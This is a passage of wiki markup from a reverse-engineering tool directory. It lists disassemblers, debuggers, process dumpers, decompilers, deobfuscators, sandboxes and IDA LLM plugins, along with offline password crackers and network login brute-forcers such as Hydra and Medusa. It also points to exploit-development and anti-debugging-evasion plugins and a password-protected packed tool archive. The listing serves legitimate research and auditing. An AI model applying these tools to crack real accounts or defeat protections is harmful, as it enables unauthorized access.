*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).&lt;br /&gt;
&lt;br /&gt;
====IAT Reconstructors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.&lt;br /&gt;
&lt;br /&gt;
====Process Monitors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/winsiderss/systeminformer/ System Informer] - is a  free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.&lt;br /&gt;
&lt;br /&gt;
====Process Dumpers (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.&lt;br /&gt;
&lt;br /&gt;
====API monitoring ring3 (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.&lt;br /&gt;
&lt;br /&gt;
*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.&lt;br /&gt;
&lt;br /&gt;
====Hashing &amp;amp; Crypto====&lt;br /&gt;
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills.&amp;lt;br&amp;gt;&lt;br /&gt;
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.&lt;br /&gt;
&lt;br /&gt;
====Password cracking====&lt;br /&gt;
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.&lt;br /&gt;
&lt;br /&gt;
Offline&lt;br /&gt;
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.&lt;br /&gt;
&lt;br /&gt;
Online (network based bruteforce in LAN).&lt;br /&gt;
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.&lt;br /&gt;
&lt;br /&gt;
====Virtualization technology (host isolation) or sandboxes====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.&lt;br /&gt;
&lt;br /&gt;
*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production. &lt;br /&gt;
&lt;br /&gt;
*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local &amp;amp; mapped drives or the Windows registry.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. &amp;quot;If you implement boundaries and nobody is around to push them, do they even exist?&amp;quot;. Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?&lt;br /&gt;
&lt;br /&gt;
*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.&lt;br /&gt;
&lt;br /&gt;
*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.&lt;br /&gt;
&lt;br /&gt;
*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.&lt;br /&gt;
&lt;br /&gt;
*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.&lt;br /&gt;
&lt;br /&gt;
*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Dynamic &amp;amp; Static Analysis (mostly '''unmanged''' binaries)====&lt;br /&gt;
&lt;br /&gt;
=====Interactive Disassemblers ('''static analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.&lt;br /&gt;
&lt;br /&gt;
::Binary Ninja Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.&lt;br /&gt;
&lt;br /&gt;
*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].&lt;br /&gt;
&lt;br /&gt;
::Ghidra Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm &amp;amp; MIPS scripts] - ARM &amp;amp; MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.&lt;br /&gt;
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.&lt;br /&gt;
:::*Qt Framework&lt;br /&gt;
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled &amp;amp; compiled with MSVC.&lt;br /&gt;
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.&lt;br /&gt;
&lt;br /&gt;
::IDA Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).&lt;br /&gt;
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.&lt;br /&gt;
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.&lt;br /&gt;
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.&lt;br /&gt;
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.&lt;br /&gt;
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.&lt;br /&gt;
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.&lt;br /&gt;
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.&lt;br /&gt;
::::*Oreans CV scripts&lt;br /&gt;
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
::IDA LLM Plugins&lt;br /&gt;
:::*Local (quantized LLMs Q4/INT4)&lt;br /&gt;
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.&lt;br /&gt;
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.&lt;br /&gt;
:::*Cloud&lt;br /&gt;
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.&lt;br /&gt;
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.&lt;br /&gt;
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.&lt;br /&gt;
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.&lt;br /&gt;
&lt;br /&gt;
*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)&lt;br /&gt;
&lt;br /&gt;
*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.&lt;br /&gt;
&lt;br /&gt;
=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework.  Includes Disassembler, Debugger, Emulation and Symbolik analysis engines.  Includes built-in Server and Shared-Workspace functionality.  Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism).  Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA.  Criticisms (from a core dev): &amp;quot;Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better.  PR's and suggestions welcome.&amp;quot;  Best installed via Pip:  &amp;lt;code&amp;gt;python3 -m pip install vivisect&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)&lt;br /&gt;
&lt;br /&gt;
*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).&lt;br /&gt;
&lt;br /&gt;
*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.&lt;br /&gt;
&lt;br /&gt;
::OllyDbg Scripts/Plugins/Mods&lt;br /&gt;
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.&lt;br /&gt;
&lt;br /&gt;
*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.&lt;br /&gt;
&lt;br /&gt;
::x64dbg Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.&lt;br /&gt;
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for &amp;quot;all&amp;quot; versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.&lt;br /&gt;
&lt;br /&gt;
*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.&lt;br /&gt;
&lt;br /&gt;
::GDB Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.&lt;br /&gt;
&lt;br /&gt;
====Debugging and Profiling dynamic analysis (Linux)====&lt;br /&gt;
&lt;br /&gt;
*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.&lt;br /&gt;
&lt;br /&gt;
*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====.NET (CLR)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo &amp;amp; '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)]  - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.&lt;br /&gt;
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&amp;amp;more) - cross-platform!&lt;br /&gt;
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.&lt;br /&gt;
&lt;br /&gt;
======.NET deobfuscators======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.&lt;br /&gt;
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.&lt;br /&gt;
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.&lt;br /&gt;
&lt;br /&gt;
======.NET memory dumpers======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).&lt;br /&gt;
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).&lt;br /&gt;
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.&lt;br /&gt;
&lt;br /&gt;
======.NET tracers======&lt;br /&gt;
&lt;br /&gt;
::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com&lt;br /&gt;
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.&lt;br /&gt;
&lt;br /&gt;
=====JAVA (JVM) Decompilers=====&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.&lt;br /&gt;
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly &amp;amp; Ethereum Decompilers.&lt;br /&gt;
&lt;br /&gt;
======JAVA (ART/APK)======&lt;br /&gt;
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.&lt;br /&gt;
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.&lt;br /&gt;
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.&lt;br /&gt;
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.&lt;br /&gt;
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar &amp;amp; Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger &amp;amp; More)&lt;br /&gt;
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR &amp;amp; Dex decompiler for android.&lt;br /&gt;
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.&lt;br /&gt;
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.&lt;br /&gt;
&lt;br /&gt;
======RASP (Runtime Application Self-Protection) Android======&lt;br /&gt;
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing.&amp;lt;br&amp;gt;&lt;br /&gt;
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted.&amp;lt;br&amp;gt;&lt;br /&gt;
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.&lt;br /&gt;
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.&lt;br /&gt;
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.&lt;br /&gt;
&lt;br /&gt;
======JAVA deobfuscators (mixed platforms)======&lt;br /&gt;
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.&lt;br /&gt;
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]&lt;br /&gt;
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.&lt;br /&gt;
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...&lt;br /&gt;
&lt;br /&gt;
======JAVA decompilers (platform independent)======&lt;br /&gt;
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers for '''unmanaged''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====AutoIt=====&lt;br /&gt;
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.&lt;br /&gt;
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.&lt;br /&gt;
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of &amp;quot;compiled&amp;quot; AutoIt scripts from PE executables.&lt;br /&gt;
&lt;br /&gt;
=====VB6=====&lt;br /&gt;
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables. &lt;br /&gt;
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.&lt;br /&gt;
&lt;br /&gt;
====Bytecode Decompilers====&lt;br /&gt;
&lt;br /&gt;
=====React Native Hermes=====&lt;br /&gt;
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.&lt;br /&gt;
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.&lt;br /&gt;
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).&lt;br /&gt;
&lt;br /&gt;
=====Python=====&lt;br /&gt;
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.&lt;br /&gt;
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.&lt;br /&gt;
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.&lt;br /&gt;
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.&lt;br /&gt;
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.&lt;br /&gt;
&lt;br /&gt;
=====Lua=====&lt;br /&gt;
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Fuzzers====&lt;br /&gt;
&lt;br /&gt;
